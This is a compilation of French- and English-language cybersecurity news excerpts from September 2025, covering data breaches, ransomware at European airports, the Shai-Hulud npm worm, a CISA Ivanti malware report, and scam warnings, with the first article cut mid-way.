L’échantillon disponible sur le dark web, présenté comme « produit d’appel », contient de nombreuses incohérences et des formats qui ne correspondent pas à ceux de l’ANTS.

Un pirate à la méthode déjà connue ?
Toutefois, même avec des informations fausses, le pirate pourrait ressortir gagnant : le schéma est simple,il publie, les influenceurs relaient, et les internautes amplifient, renforçant la visibilité et la valeur commerciale des annonces. Bref, un arnaqueur qui en plume d’autres en vendant des données trompeuses.

Pour l’instant, l’affaire est à suivre, mais l’ANTS a porté plainte contre X et poursuivra le dossier devant la justice. L’Agence Nationale de la Sécurité des Systèmes d’Information (ANSSI) est aussi mobilisée pour identifier l’origine de ces données et les auteurs de leur diffusion.

Au final, si l’ANTS rassure sur l’absence d’intrusion dans ses systèmes, la circulation éventuelle de certaines données reste une possibilité à surveiller.

bbc.com/ Jacqueline Howard

The pair were allegedly recruited by pro-Russian hackers and used a "wi-fi sniffer" on the Europol headquarters.

Two 17-year-old boys have been arrested on suspicion of "state interference" in the Netherlands, prosecutors say, in a case with reported links to Russian spying.

The pair were allegedly contacted by pro-Russian hackers on the messaging app Telegram, Dutch media reported.

One of the boys allegedly walked past the offices of Europol, Eurojust and the Canadian embassy in The Hague carrying a "wi-fi sniffer" - a device designed to identify and intercept wi-fi networks.

The teenagers appeared before a judge on Thursday, who ordered one boy be remanded in custody and the other placed on strict home bail conditions until a hearing, which is due to take place in the next two weeks.

The National Office of the Netherlands Public Prosecution Service confirmed court appearance, but told the BBC it could not provide details on the case due to the suspects' age and in "the interest of the investigation", which is ongoing.

One of the boy's father told Dutch newspaper De Telegraaf that police had arrested his son on Monday afternoon while he was doing his homework.

He said police told him that the arrest related to espionage and rendering services to a foreign country, the paper reports.

The teenager was described as being computer savvy and having a fascination for hacking, while holding a part-time job at a supermarket.

The Netherlands' domestic intelligence and security agency declined to comment on the case when approached by the BBC.

| TechCrunch techcrunch.com
Zack Whittaker
Sarah Perez
2:10 PM PDT · September 25, 2025

Call recording app Neon was one of the top-ranked iPhone apps, but was pulled offline after a security bug allowed any logged-in user to access the call recordings and transcripts of any other user.

A viral app called Neon, which offers to record your phone calls and pay you for the audio so it can sell that data to AI companies, has rapidly risen to the ranks of the top-five free iPhone apps since its launch last week.

The app already has thousands of users and was downloaded 75,000 times yesterday alone, according to app intelligence provider Appfigures. Neon pitches itself as a way for users to make money by providing call recordings that help train, improve, and test AI models.

But Neon has gone offline, at least for now, after a security flaw allowed anyone to access the phone numbers, call recordings, and transcripts of any other user, TechCrunch can now report.

TechCrunch discovered the security flaw during a short test of the app on Thursday. We alerted the app’s founder, Alex Kiam (who previously did not respond to a request for comment about the app), to the flaw soon after our discovery.

Kiam told TechCrunch later Thursday that he took down the app’s servers and began notifying users about pausing the app, but fell short of informing his users about the security lapse.

The Neon app stopped functioning soon after we contacted Kiam.

Call recordings and transcripts exposed
At fault was the fact that the Neon app’s servers were not preventing any logged-in user from accessing someone else’s data.

TechCrunch created a new user account on a dedicated iPhone and verified a phone number as part of the sign-up process. We used a network traffic analysis tool called Burp Suite to inspect the network data flowing in and out of the Neon app, allowing us to understand how the app works at a technical level, such as how the app communicates with its back-end servers.

After making some test phone calls, the app showed us a list of our most recent calls and how much money each call earned. But our network analysis tool revealed details that were not visible to regular users in the Neon app. These details included the text-based transcript of the call and a web address to the audio files, which anyone could publicly access as long as they had the link.

For example, here you can see the transcript from our test call between two TechCrunch reporters confirming that the recording worked properly.

a JSON response from Neon Mobile's server, which reads as transcript text from a call between two TC reporters, which says: "Uh, it worked. Hooray. Okay. Thanks, mate."
Image Credits:TechCrunch
But the back-end servers were also capable of spitting out reams of other people’s call recordings and their transcripts.

In one case, TechCrunch found that the Neon servers could produce data about the most recent calls made by the app’s users, as well as providing public web links to their raw audio files and the transcript text of what was said on the call. (The audio files contain recordings of just those who installed Neon, not those they contacted.)

Similarly, the Neon servers could be manipulated to reveal the most recent call records (also known as metadata) from any of its users. This metadata contained the user’s phone number and the phone number of the person they’re calling, when the call was made, its duration, and how much money each call earned.

A review of a handful of transcripts and audio files suggests some users may be using the app to make lengthy calls that covertly record real-world conversations with other people in order to generate money through the app.

App shuts down, for now
Soon after we alerted Neon to the flaw on Thursday, the company’s founder, Kiam, sent out an email to customers alerting them to the app’s shutdown.

“Your data privacy is our number one priority, and we want to make sure it is fully secure even during this period of rapid growth. Because of this, we are temporarily taking the app down to add extra layers of security,” the email, shared with TechCrunch, reads.

Notably, the email makes no mention of a security lapse or that it exposed users’ phone numbers, call recordings, and call transcripts to any other user who knew where to look.

It’s unclear when Neon will come back online or whether this security lapse will gain the attention of the app stores.

Apple and Google have not yet commented following TechCrunch’s outreach about whether or not Neon was compliant with their respective developer guidelines.

However, this would not be the first time that an app with serious security issues has made it onto these app marketplaces. Recently, a popular mobile dating companion app, Tea, experienced a data breach, which exposed its users’ personal information and government-issued identity documents. Popular apps like Bumble and Hinge were caught in 2024 exposing their users’ locations. Both stores also have to regularly purge malicious apps that slip past their app review processes.

When asked, Kiam did not immediately say if the app had undergone any security review ahead of its launch, and if so, who performed the review. Kiam also did not say, when asked, if the company has the technical means, such as logs, to determine if anyone else found the flaw before us or if any user data was stolen.

TechCrunch additionally reached out to Upfront Ventures and Xfund, which Kiam claims in a LinkedIn post have invested in his app. Neither firm has responded to our requests for comment as of publication.

Exclusive: Tech firm ends military unit’s access to AI and data services after Guardian reveals secret spy project

Microsoft blocks Israel’s use of its technology in mass surveillance of Palestinians

Exclusive: Tech firm ends military unit’s access to AI and data services after Guardian reveals secret spy project

Microsoft has terminated the Israeli military’s access to technology it used to operate a powerful surveillance system that collected millions of Palestinian civilian phone calls made each day in Gaza and the West Bank, the Guardian can reveal.

Microsoft told Israeli officials late last week that Unit 8200, the military’s elite spy agency, had violated the company’s terms of service by storing the vast trove of surveillance data in its Azure cloud platform, sources familiar with the situation said.

The decision to cut off Unit 8200’s ability to use some of its technology results directly from an investigation published by the Guardian last month. It revealed how Azure was being used to store and process the trove of Palestinian communications in a mass surveillance programme.

In a joint investigation with the Israeli-Palestinian publication +972 Magazine and the Hebrew-language outlet Local Call, the Guardian revealed how Microsoft and Unit 8200 had worked together on a plan to move large volumes of sensitive intelligence material into Azure.

The project began after a meeting in 2021 between Microsoft’s chief executive, Satya Nadella, and the unit’s then commander, Yossi Sariel.

In response to the investigation, Microsoft ordered an urgent external inquiry to review its relationship with Unit 8200. Its initial findings have now led the company to cancel the unit’s access to some of its cloud storage and AI services.

Equipped with Azure’s near-limitless storage capacity and computing power, Unit 8200 had built an indiscriminate new system allowing its intelligence officers to collect, play back and analyse the content of cellular calls of an entire population.

The project was so expansive that, according to sources from Unit 8200 – which is equivalent in its remit to the US National Security Agency – a mantra emerged internally that captured its scale and ambition: “A million calls an hour.”

According to several sources, the enormous repository of intercepted calls – which amounted to as much as 8,000 terabytes of data – was held in a Microsoft datacentre in the Netherlands. Within days of the Guardian publishing the investigation, Unit 8200 appears to have swiftly moved the surveillance data out of the country.

According to sources familiar with the huge data transfer outside of the EU country, it occurred in early August. Intelligence sources said Unit 8200 planned to transfer the data to the Amazon Web Services cloud platform. Neither the Israel Defense Forces (IDF) nor Amazon responded to a request for comment.

The extraordinary decision by Microsoft to end the spy agency’s access to key technology was made amid pressure from employees and investors over its work for Israel’s military and the role its technology has played in the almost two-year offensive in Gaza.

A United Nations commission of inquiry recently concluded that Israel had committed genocide in Gaza, a charge denied by Israel but supported by many experts in international law.

The Guardian’s joint investigation prompted protests at Microsoft’s US headquarters and one of its European datacentres, as well as demands by a worker-led campaign group, No Azure for Apartheid, to end all ties to the Israeli military.

No Azure for Apartheid demonstrators
On Thursday, Microsoft’s vice-chair and president, Brad Smith, informed staff of the decision. In an email seen by the Guardian, he said the company had “ceased and disabled a set of services to a unit within the Israel ministry of defense”, including cloud storage and AI services.

Smith wrote: “We do not provide technology to facilitate mass surveillance of civilians. We have applied this principle in every country around the world, and we have insisted on it repeatedly for more than two decades.”

The decision brings to an abrupt end a three-year period in which the spy agency operated its surveillance programme using Microsoft’s technology.

Unit 8200 used its own expansive surveillance capabilities to intercept and collect the calls. The spy agency then used a customised and segregated area within the Azure platform, allowing for the data to be retained for extended periods of time and analysed using AI-driven techniques.

Although the initial focus of the surveillance system was the West Bank, where an estimated 3 million Palestinians live under Israeli military occupation, intelligence sources said the cloud-based storage platform had been used in the Gaza offensive to facilitate the preparation of deadly airstrikes.

The revelations highlighted how Israel has relied on the services and infrastructure of major US technology companies to support its bombardment of Gaza, which has killed more than 65,000 Palestinians, mostly civilians, and created a profound humanitarian and starvation crisis.

cisa.gov

The Cybersecurity and Infrastructure Security Agency (CISA) obtained two sets of malware, five files in total, from an organization where cyber threat actors exploited CVE-2025-4427 [CWE-288: Authentication Bypass Using an Alternate Path or Channel] and CVE-2025-4428 [CWE-‘Code Injection’] in Ivanti Endpoint Manager Mobile (Ivanti EPMM) deployments for initial access.

Note: Ivanti provided a patch and disclosed the vulnerabilities on May 13, 2025. CISA added both vulnerabilities to its Known Exploited Vulnerabilities Catalog on May 19, 2025.

Around May 15, 2025, following publication of a proof of concept, the cyber threat actors gained access to the server running EPMM by chaining these vulnerabilities. The cyber threat actors targeted the /mifs/rs/api/v2/ endpoint with HTTP GET requests and used the ?format= parameter to send malicious remote commands. The commands enabled the threat actors to collect system information, download malicious files, list the root directory, map the network, execute scripts to create a heapdump, and dump Lightweight Directory Access Protocol (LDAP) credentials.

CISA analyzed two sets of malicious files the cyber threat actors wrote to the /tmp directory. Each set of malware enabled persistence by allowing the cyber threat actors to inject and run arbitrary code on the compromised server.

CISA encourages organizations to use the indicators of compromise (IOCs) and detection signatures in this Malware Analysis Report to identify malware samples. If identified, follow the guidance in the Incident Response section of this Malware Analysis Report. Additionally, organizations should ensure they are running the latest version of Ivanti EPMM as soon as possible.

Communiqué : cyberattaque et vol de données
Publié le : 19/09/2025
Modifié le : 19/09/2025
La Fédération Française de Tennis de Table informe avoir été victime d’une cyberattaque et d’un vol de données : vigilance conseillée à tous nos licenciés.

La FFTT a récemment subi une attaque informatique compromettant la sécurité des données personnelles de ses licenciés.

Un accès non-autorisé par l’usage d’un compte compromis a permis une récupération en masse d’informations dans notre base de données des licenciés. Les données concernées incluent notamment le numéro de licence, nom, prénom, genre, date et lieu de naissance, nationalité ainsi que des moyens de contact tels que adresse postale, adresse email et numéro de téléphone. En revanche, aucune donnée concernant des coordonnées bancaires ou des données de santé n’a été atteinte.

La FFTT regrette profondément cette situation et tient à assurer que l’ensemble de ses services sont mobilisés pour gérer cette intrusion. Le service informatique fédéral travaille, en collaboration avec ses prestataires techniques, à la correction de cette faille de sécurité.

Cet incident appelle à une vigilance accrue des licenciés face aux risques potentiels qui en découlent (risques d’hameçonnage (phishing), de tentatives d’escroqueries ou encore d’usurpation d’identité).

La FFTT invite donc ses membres à la plus grande prudence face aux prochaines communications qu’ils pourraient recevoir, notamment tout message suspect ou inhabituel émanant en apparence de la FFTT ou d’un autre expéditeur (invitation à ouvrir une pièce jointe suspecte ou à communiquer vos comptes, mots de passe ou données bancaires).

Toutes les informations sur les bonnes pratiques en matière de cybermalveillance.

La FFTT va adresser une communication aux personnes concernées.

Une plainte a été déposée et les autorités compétentes ont été informées (ANSSI, CNIL).

Pour toutes informations supplémentaires concernant cet événement, les services de la fédération sont joignables par courriel à l’adresse suivante : cyber@fftt.org

bleepingcomputer.com
by Sergiu Gatlan
September 23, 2025

SonicWall has released a firmware update that can help customers remove rootkit malware deployed in attacks targeting SMA 100 series devices.

SonicWall has released a firmware update that can help customers remove rootkit malware deployed in attacks targeting SMA 100 series devices.

"SonicWall SMA 100 10.2.2.2-92sv build has been released with additional file checking, providing the capability to remove known rootkit malware present on the SMA devices," the company said in a Monday advisory.

"SonicWall strongly recommends that users of the SMA 100 series products (SMA 210, 410, and 500v) upgrade to the 10.2.2.2-92sv version."

The update follows a July report from researchers at the Google Threat Intelligence Group (GTIG), who observed a threat actor tracked as UNC6148 deploying OVERSTEP malware on end-of-life (EoL) SonicWall SMA 100 devices that will reach end-of-support next week, on October 1, 2025.

OVERSTEP is a user-mode rootkit that enables attackers to maintain persistent access by using hidden malicious components and establishing a reverse shell on compromised devices. The malware steals sensitive files, including the persist.database and certificate files, providing hackers with access to credentials, OTP seeds, and certificates that further enable persistence.

While the researchers have not determined the goal behind UNC6148's attacks, they did find "noteworthy overlaps" with Abyss-related ransomware incidents.

For instance, in late 2023, Truesec investigated an Abyss ransomware incident in which hackers installed a web shell on an SMA appliance, enabling them to maintain persistence despite firmware updates. In March 2024, InfoGuard AG incident responder Stephan Berger reported a similar SMA device compromise that also resulted in the deployment of Abyss malware.

"The threat intelligence report from Google Threat Intelligence Group (GTIG) highlights potential risk of using older versions of SMA100 firmware," SonicWall added on Monday, urging admins to implement the security measures outlined in this July advisory.

Last week, SonicWall warned customers to reset credentials after their firewall configuration backup files were exposed in brute-force attacks targeting the API service for cloud backup.

In August, the company also dismissed claims that the Akira ransomware gang was hacking Gen 7 firewalls using a potential zero-day exploit, clarifying that the issue was tied to a critical vulnerability (CVE-2024-40766) that was patched in November 2024.

The Australian Cyber Security Center (ACSC) and cybersecurity firm Rapid7 later confirmed that the Akira gang is exploiting this vulnerability to target unpatched SonicWall devices.

bbc.com
Imran Rahman-JonesTechnology reporter andJoe TidyCyber correspondent, BBC World Service

The National Crime Agency (NCA) said a man in his forties was arrested in West Sussex.

A person has been arrested in connection with a cyber-attack which has caused days of disruption at several European airports including Heathrow.

The National Crime Agency (NCA) said a man in his forties was arrested in West Sussex "as part of an investigation into a cyber incident impacting Collins Aerospace".

There have been hundreds of flight delays after Collins Aerospace baggage and check-in software used by several airlines failed, with some boarding passengers using pen and paper.

"Although this arrest is a positive step, the investigation into this incident is in its early stages and remains ongoing," said Paul Foster, head of the NCA's national cyber crime unit.

The man was arrested on Tuesday evening on suspicion of Computer Misuse Act offences and has been released on bail.

The BBC has seen an internal memo sent to airport staff at Heathrow about the difficulties software provider Collins Aerospace is having bringing their check-in software back online.

The US company appears to be rebuilding the system again after trying to relaunch it on Monday.

Collins Aerospace's parent company RTX Corporation told the BBC it appreciated the NCA's "ongoing assistance in this matter".

The US firm has not put a timeline on when it will be ready and is urging ground handlers and airlines to plan for at least another week of using manual workarounds.

At Heathrow, extra staff have been deployed in terminals to help passengers and check-in operators but flights are still experiencing delays.

On Monday, the EU's cyber-security agency said ransomware had been deployed in the attack.

Ransomware is often used to seriously disrupt victims' systems and a ransom is demanded in cryptocurrency to reverse the damage.

These types of attacks are an issue for organisations around the country, with organised cyber-crime gangs earning hundreds of millions of pounds from ransoms every year.

Days of disruption
The attack against US software maker Collins Aerospace was discovered on Friday night and resulted in disruption across many European airports, including in Brussels, Dublin and Berlin.

Flights were cancelled and delayed throughout the weekend, with some airports still experiencing effects of the delays into this week.

"The vast majority of flights at Heathrow are operating as normal, but we encourage passengers to check the status of their flight before travelling to the airport," Heathrow Airport said in a statement on its website.

Berlin Airport said on Wednesday morning "check-in and boarding are still largely manual", which would result in "longer processing times, delays, and cancellations by airlines".

While Brussels Airport advised passengers to check in online before arriving at the airport.

Cyber-attacks in the aviation sector have increased by 600% over the past year, according to a report by French aerospace company Thales.

bbc.com Joe TidyCyber correspondent and
Tabby Wilson

The EU's cyber security agency says criminals are using ransomware to cause chaos in airports around the world.

Several of Europe's busiest airports have spent the past few days trying to restore normal operations, after a cyber-attack on Friday disrupted their automatic check-in and boarding software.

The European Union Agency for Cybersecurity, ENISA, told the BBC on Monday that the malicious software was used to scramble automatic check-in systems.

"The type of ransomware has been identified. Law enforcement is involved to investigate," the agency said in a statement to news agency Reuters.

It's not known who is behind the attack, but criminal gangs often use ransomware to seriously disrupt their victims' systems and demand a ransom in bitcoin to reverse the damage.

The BBC has seen internal crisis communications from staff inside Heathrow Airport which urges airlines to continue to use manual workarounds to board and check in passengers as the recovery is ongoing.

Heathrow said on Sunday it was still working to resolve the issue, and apologised to customers who had faced delayed travel.

It stressed "the vast majority of flights have continued to operate" and urged passengers to check their flight status before travelling to the airport.

The BBC understands about half of the airlines flying from Heathrow were back online in some form by Sunday - including British Airways, which has been using a back-up system since Saturday.
Continued disruption

The attack against US software maker Collins Aerospace was discovered on Friday night and resulted in disruption across several airports on Saturday.

While this had eased significantly in Berlin and London Heathrow by Sunday, delays and flight cancellations remained.

Brussels Airport, also affected, said the "service provider is actively working on the issue" but it was still "unclear" when the issue would be resolved.

They have asked airlines to cancel nearly 140 of their 276 scheduled outbound flights for Monday, according to the AP news agency.

Meanwhile, a Berlin Airport spokesperson told the BBC some airlines were still boarding passengers manually and it had no indication on how long the electronic outage would last.

news.sophos.com
Written by Ross McKerchar
September 22, 2025

A Sophos employee was phished, but we countered the threat with an end-to-end defense process
If you work in cybersecurity, you’ve probably heard the time-honored adage about cyber attacks: “It’s not a matter of if, but when.” Perhaps a better way to think of it is this: while training, experience, and familiarity with social engineering techniques help, anyone can fall for a well-constructed ruse. Everyone – including security researchers – has a vulnerability that could make them susceptible, given the right situation, timing, and circumstances.

Cybersecurity companies aren’t immune by any means. In March 2025, a senior Sophos employee fell victim to a phishing email and entered their credentials into a fake login page, leading to a multi-factor authentication (MFA) bypass and a threat actor trying – and failing – to worm their way into our network.

We’ve published an external root cause analysis (RCA) about this incident on our Trust Center, which dives into the details – but the incident raised some interesting broader topics that we wanted to share some thoughts on.

First, it’s important to note that MFA bypasses are increasingly common. As MFA has become more widespread, threat actors have adapted, and several phishing frameworks and services now incorporate MFA bypass capabilities (another argument for the wider adoption of passkeys).

Second, we’re sharing the details of this incident not to highlight that we successfully repelled an attack – that’s our day job – but because it’s a good illustration of an end-to-end defense process, and has some interesting learning points.

Third, three things were key to our response: controls, cooperation, and culture.

Controls
Our security controls are layered, with the objective of being resilient to human failure and bypasses of earlier layers. The guiding principle behind a ‘defense-in-depth’ security policy is that when one control is bypassed, or fails, others should kick in – providing protection across as much of the cyber kill chain as possible.

As we discussed in the corresponding RCA, this incident involved multiple layers – email security, MFA, a Conditional Access Policy (CAP), device management, and account restrictions. While the threat actor bypassed some of those layers, subsequent controls were then triggered.

Crucially, however, we didn’t sit on our laurels after the incident. The threat actor was unsuccessful, but we didn’t congratulate ourselves and get on with our day. We investigated every aspect of the attack, conducted an internal root cause analysis, and assessed the performance of every control involved. Where a control was bypassed, we reviewed why this was the case and what we could do to improve it. Where a control worked effectively, we asked ourselves what threat actors might do in the future to bypass it, and then investigated how to mitigate against that.

Cooperation
Our internal teams work closely together all the time, and one of the key outcomes of that is a cooperative culture – particularly when there’s an urgent and active threat, whether internal or affecting our customers.

Sophos Labs, Managed Detection and Response (MDR), Internal Detection and Response (IDR), and our internal IT team worked within their different specialties and areas of expertise to eliminate the threat, sharing information and insights. Going forward, we’re looking at ways to improve our intelligence-gathering capabilities and tightening feedback loops – not just internally, but within the wider security community. Ingesting and operationalizing intelligence, making it actionable, and proactively using it to defend our estate, is a key priority. While we responded effectively to this incident, we can always be better.

Culture
We try to foster a culture in which the predominant focus is solving the problem and making things safe, rather than apportioning blame or criticizing colleagues for mistakes – and we don’t reprimand or discipline users who click on phishing links.

The employee in this incident felt able to directly inform colleagues that they had fallen for a phishing lure. In some organizations, users may not feel comfortable admitting to a mistake, whether that’s due to fear of reprisal or personal embarrassment. Others may hope that if they ignore a suspicious incident, the problem will go away. At Sophos, all users – whatever their role and level of seniority – are encouraged to report any suspicions. As we noted at the beginning of this article, we know that anyone can fall for a social engineering ruse given the right circumstances.

It’s often said – not necessarily helpfully – that humans are the weakest link in security. But they are also often the first line of defense, and can play a vital part in notifying security teams, validating automated alerts (or even alerting security themselves if technical controls fail), and providing additional context and intelligence.

Conclusion
An attacker breached our perimeter, but a combination of controls, cooperation, and culture meant that they were severely restricted in what they could do, before we removed them from our systems. Our post-incident review, and the lessons we took from it, means that our security posture is stronger, in readiness for the next attempt. By publicly and transparently sharing those lessons both here and in the RCA, we hope yours will be too.

ncsc.admin.ch OFCS CH

23.09.2025 - La semaine dernière, l’OFCS a reçu plusieurs signalements d’arnaque à la récupération. Dans le cadre de cette escroquerie, les cybercriminels reprennent contact avec les personnes qui ont déjà été victimes d’une fraude à l’investissement. Ils prétendent alors qu’ils ont « retrouvé » l’argent perdu et incitent les victimes à effectuer un paiement pour le récupérer. Afin de donner un caractère officiel à leur tentative d’arnaque, ils utilisent souvent le nom d’institutions publiques en se faisant par exemple passer pour un soi-disant collaborateur du NCSC.pour le récupérer. Afin de donner un caractère officiel à leur tentative d’arnaque, ils utilisent souvent le nom d’institutions publiques en se faisant par exemple passer pour un soi-disant collaborateur du NCSC.

Non contents d’avoir réussi une fraude à l’investissement, parfois les escrocs enfoncent le clou. En effet, il arrive qu’après quelque temps, ils reprennent contact avec une victime en lui promettant de lui rendre son argent. Il s’agit toutefois d’une nouvelle arnaque, qui fait perdre encore plus d’argent aux personnes visées. Cette pratique frauduleuse est aussi connue sous le nom de recovery scam ou refund scam en anglais. Dans les cas actuellement signalés à l’OFCS, les courriels ne sont pas seulement envoyés à d’anciennes victimes, mais aussi à d’autres destinataires au hasard, dans l’espoir de provoquer une réaction. Pour donner plus de crédibilité à leur démarche, les escrocs prétendent souvent qu’ils travaillent pour un prestataire de sécurité ou une autorité de poursuite pénale. Il arrive aussi qu’ils usurpent l’identité d’un collaborateur. Dans certains cas, il s’agit de personnes existantes et dans d’autres, de collaborateurs fictifs. La semaine passée, les escrocs se sont fait passer à plusieurs reprises pour Daniel Bruno, soi-disant collaborateur du NCSC. Dans son courriel, le faux inspecteur du NCSC prétend qu’il est chargé de rembourser l’argent perdu aux victimes d’une arnaque.

Un courriel ou un appel téléphonique d’apparence officielle
Les auteurs renforcent leur légitimité douteuse en utilisant des documents falsifiés d’apparence professionnelle pour tromper leurs victimes. Tout commence par un appel téléphonique ou un courriel. Dans les cas signalés récemment, les escrocs utilisent une carte de légitimation falsifiée. Elle contient les données suivantes : Daniel Bruno, « Senior Asset Investigator » du « National Cyber Security Centre ». Le logo de plusieurs organisations, un numéro d’identité fictif et une date de validité figurent aussi sur la carte pour garantir son authenticité. Le faux Daniel Bruno prend contact avec sa victime par courriel ou par téléphone en prétendant qu’il coopère avec des autorités étrangères comme l’organe de surveillance financière britannique (« Financial Conduct Authority FCA »), ce qui peut faire penser à une opération internationale de grande envergure.

L’adresse utilisée, à savoir une adresse gmail dans le cas précis, doit éveiller les soupçons. En effet, les services gouvernementaux ne font jamais appel à des fournisseurs de messagerie web génériques pour communiquer. Dans le message, la victime apprend que lors d’une investigation, son nom a été retrouvé dans le fichier clientèle d’un courtier mal intentionné et qu’une somme d’argent importante est prête à lui être remboursée (p. ex. un montant de 220 600 USDT, une cryptomonnaie bien connue équivalent au dollar américain).

La sensibilisation de la population aux tentatives de fraude simples force les cybercriminels à se montrer toujours plus ingénieux. Comme les gens sont de plus en plus suspicieux face aux courriels d’hameçonnage basiques, les escrocs doivent affiner leurs méthodes pour parvenir à tromper leurs victimes potentielles. Des documents préparés avec soin et la référence à des autorités existantes permettent de convaincre même les personnes les plus méfiantes.

La stratégie consistant à se faire passer pour un collaborateur du NCSC est particulièrement sournoise. Les escrocs abusent délibérément de la confiance que leurs victimes accordent à l’institution à laquelle elles sont censées s’adresser quand elles font face à la cybercriminalité. Ils piègent ainsi les victimes à l’endroit même où elles pensent trouver de l’aide.

L’Office fédéral de la cybersécurité, NCSC en anglais, confirme : Daniel Bruno ne travaille pas pour le NCSC ou pour une autre autorité apparentée, ni en Suisse ni au Royaume-Uni. Tous les documents associés sont falsifiés. L’OFCS ne prend jamais spontanément contact avec des citoyennes et des citoyens en leur promettant un remboursement moyennant un paiement préalable.

L’escroc sonne toujours deux fois
Le cas de Daniel Bruno est un exemple d’arnaque à la récupération. D’autres exemples ont déjà été présentés dans de précédentes versions de la rétrospective hebdomadaire de l’OFCS (p. ex. rétrospective hebdomadaire de la semaine 38/2024).

L’arnaque se déroule en deux temps :

Fraude initiale : la victime perd de l’argent à cause d’une forme quelconque d’escroquerie en ligne, par exemple une fraude à l’investissement avec des cryptomonnaies, une arnaque à la commission dans le cadre d’un prétendu gain à la loterie ou une attaque par hameçonnage.
Fraude ultérieure (arnaque à la récupération) : quelque temps après la première arnaque, la victime est contactée par d’autres cybercriminels, qui se font passer pour des représentants d’un organe officiel comme la police, une autorité de surveillance financière, un cabinet d’avocats ou justement le NCSC. Ils expliquent qu’ils ont arrêté les auteurs de la fraude initiale et qu’ils ont retrouvé l’argent que la victime avait perdu.
Dans ce type d’arnaque, un paiement préalable est exigé. Pour récupérer son argent, la victime doit d’abord effectuer un versement. Les escrocs invoquent différents prétextes comme des frais de dossier, des honoraires d’avocats, des coûts administratifs ou des taxes. Dès que la victime a effectué le paiement, les cybercriminels coupent tout contact ou prétextent d’autres frais urgents pour lui soutirer un montant encore plus élevé. La victime perd ainsi une nouvelle fois de l’argent et n’obtient bien entendu aucun remboursement.

Recommandations
Faites preuve d’une grande vigilance à l’égard des courriels spontanés qui promettent de vous rembourser l’argent que vous avez perdu.
Ne faites jamais aucun versement pour récupérer de l’argent que vous avez perdu. Aucun organe officiel ne vous demandera d’effectuer un paiement préalable.
Ne donnez jamais l’accès à votre ordinateur à votre interlocuteur.
Vérifiez l’adresse électronique de l’expéditeur. Les autorités comme l’OFCS ou le NCSC ne font jamais appel à un fournisseur de messagerie gratuite pour communiquer.
Ne répondez pas à ces courriels et ne cliquez pas sur les liens ou les pièces jointes qu’ils contiennent.
En cas de perte financière, déposez plainte auprès de la police de votre canton.

The GitHub Blog github.blog Xavier René-Corail·@xcorail
September 22, 2025

Open source software is the bedrock of the modern software industry. Its collaborative nature and vast ecosystem empower developers worldwide, driving efficiency and progress at an unprecedented scale. This scale also presents unique vulnerabilities that are continually tested and under attack by malicious actors, making the security of open source a critical concern for all.

Transparency is central to maintaining community trust. Today, we’re sharing details of recent npm registry incidents, the actions we took towards remediation, and how we’re continuing to invest in npm security.

Recent attacks on the open source ecosystem
The software industry has faced a recent surge in damaging account takeovers on package registries, including npm. These ongoing attacks have allowed malicious actors to gain unauthorized access to maintainer accounts and subsequently distribute malicious software through well-known, trusted packages.

On September 14, 2025, we were notified of the Shai-Hulud attack, a self-replicating worm that infiltrated the npm ecosystem via compromised maintainer accounts by injecting malicious post-install scripts into popular JavaScript packages. By combining self-replication with the capability to steal multiple types of secrets (and not just npm tokens), this worm could have enabled an endless stream of attacks had it not been for timely action from GitHub and open source maintainers.

In direct response to this incident, GitHub has taken swift and decisive action including:

Immediate removal of 500+ compromised packages from the npm registry to prevent further propagation of malicious software.
npm blocking the upload of new packages containing the malware’s IoCs (Indicators of Compromise), cutting off the self-replicating pattern.
Such breaches erode trust in the open source ecosystem and pose a direct threat to the integrity and security of the entire software supply chain. They also highlight why raising the bar on authentication and secure publishing practices is essential to strengthening the npm ecosystem against future attacks.

npm’s roadmap for hardening package publication
GitHub is committed to investigating these threats and mitigating the risks that they pose to the open source community. To address token abuse and self-replicating malware, we will be changing authentication and publishing options in the near future to only include:

Local publishing with required two-factor authentication (2FA).
Granular tokens which will have a limited lifetime of seven days.
Trusted publishing.
To support these changes and further improve the security of the npm ecosystem, we will:

Deprecate legacy classic tokens.
Deprecate time-based one-time password (TOTP) 2FA, migrating users to FIDO-based 2FA.
Limit granular tokens with publishing permissions to a shorter expiration.
Set publishing access to disallow tokens by default, encouraging usage of trusted publishers or 2FA enforced local publishing.
Remove the option to bypass 2FA for local package publishing.
Expand eligible providers for trusted publishing.
We recognize that some of the security changes we are making may require updates to your workflows. We are going to roll these changes out gradually to ensure we minimize disruption while strengthening the security posture of npm. We’re committed to supporting you through this transition and will provide future updates with clear timelines, documentation, migration guides, and support channels.

Strengthening the ecosystem with trusted publishing
Trusted publishing is a recommended security capability by the OpenSSF Securing Software Repositories Working Group as it removes the need to securely manage an API token in the build system. It was pioneered by PyPI in April 2023 as a way to get API tokens out of build pipelines. Since then, trusted publishing has been added to RubyGems (December 2023), crates.io (July 2025), npm (also July 2025), and most recently NuGet (September 2025), as well as other package repositories.

When npm released support for trusted publishing, it was our intention to let adoption of this new feature grow organically. However, attackers have shown us that they are not waiting. We strongly encourage projects to adopt trusted publishing as soon as possible, for all supported package managers.

Actions that npm maintainers can take today
These efforts, from GitHub and the broader software community, underscore our global commitment to fortifying the security of the software supply chain. The security of the ecosystem is a shared responsibility, and we’re grateful for the vigilance and collaboration of the open source community.

Here are the actions npm maintainers can take now:

Use npm trusted publishing instead of tokens.
Strengthen publishing settings on accounts, orgs, and packages to require 2FA for any writes and publishing actions.
When configuring two-factor authentication, use WebAuthn instead of TOTP.
True resilience requires the active participation and vigilance of everyone in the software industry. By adopting robust security practices, leveraging available tools, and contributing to these collective efforts, we can collectively build a more secure and trustworthy open source ecosystem for all.

| Euractiv euractiv.com Sep 23, 2025 - 09:44 Chris Powers
AFP
/
Euractiv

Danish police said on Tuesday that they did not know who was responsible for flying drones over Copenhagen airport the previous evening, but that they appeared to have been knowledgeable.

Overnight on Monday, the appearance of drones caused the main airports of both Denmark and Norway to close for several hours, causing flight diversions and other travel disruption. While flights are now resuming, heavy travel delays were expected to last throughout Tuesday.

“The number, size, flight patterns, time over the airport. All this together … indicates that it is a capable actor. Which capable actor, I do not know,” Danish police inspector Jens Jespersen told reporters at a press conference Tuesday morning.

The airport was closed for several hours before reopening early Tuesday, causing numerous delays and travel disruptions to 20,000 passengers, airport officials said.

Among those affected was European Commissioner Roxana Mînzatu, whose plane was diverted from Copenhagen to the Swedish town of Ängelholm.

Police said several large drones were seen over the Danish capital’s Kastrup airport on Monday. A heavy police presence was dispatched to investigate the drone activity, and the devices could be seen coming and going for several hours before flying away on their own.

“The drones have disappeared and the airport is open again,” Deputy Police Inspector Jakob Hansen told reporters. “We didn’t take the drones down,” he added.

Who dunnit?
